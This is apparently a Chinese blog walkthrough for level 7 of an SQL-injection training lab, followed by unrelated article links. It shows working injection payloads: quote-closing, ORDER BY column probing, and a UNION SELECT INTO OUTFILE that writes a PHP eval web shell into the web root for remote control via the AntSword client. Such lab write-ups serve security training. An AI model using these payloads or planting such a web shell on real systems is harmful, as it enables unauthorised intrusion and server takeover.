SQL靶场第七关攻略

一.判断闭合点

闭合点为?id=1'))--+

二.判断列数

输入?id=1')) order by 3--+页面正常

输入?id=1')) order by 4--+页面异常,说明有3列

这里显示让我们用outfile来打这关,那我们先了解一下outfile:

用法:select 列名 from table [where语句] into outfile '目标文件'

三.写入木马文件

输入?id=-1')) union select 1,2,3 into outfile "D:/phpstudy/phpstudy_pro/WWW/1.txt"--+测试一下是否能把文件写进去

在这里发现写进来以后,就可以写我们的木马文件

输入?id=-1')) union select 1,2,'<?php eval($_post['cmd'])?>' into outfile "D:/phpstudy/phpstudy_pro/WWW/1.php"--+

这样就把我们的木马文件写进来了,我们打开蚁剑连接

连上蚁剑就获得了他的数据库的管理权限了,以上就是第七关的通关攻略

相关推荐
duration~1 小时前
PostgreSQL并发控制
数据库·postgresql
给力学长1 小时前
自习室预约小程序的设计与实现
java·数据库·vue.js·elementui·小程序·uni-app·node.js
迷茫运维路2 小时前
MySQL5.7主从延迟高排查优化思路
数据库·主从延时高
菜鸟学Python3 小时前
Python web框架王者 Django 5.0发布:20周年了!
前端·数据库·python·django·sqlite
小云数据库服务专线3 小时前
GaussDB 查看会话连接数
数据库·gaussdb
墨迹的陌离4 小时前
【Linux】重生之从零开始学习运维之Mysql
linux·运维·服务器·数据库·学习·mysql
BigBigHang5 小时前
【docker】DM8达梦数据库的docker-compose以及一些启动踩坑
数据库·docker·容器
m0_720245016 小时前
QT(四)基本组件
数据库·qt·microsoft
葡萄城技术团队6 小时前
利用 SQL Server 实现字符替换的高效函数
sql
Databend6 小时前
使用 Databend Cloud 归档 OceanBase 数据数据库
数据库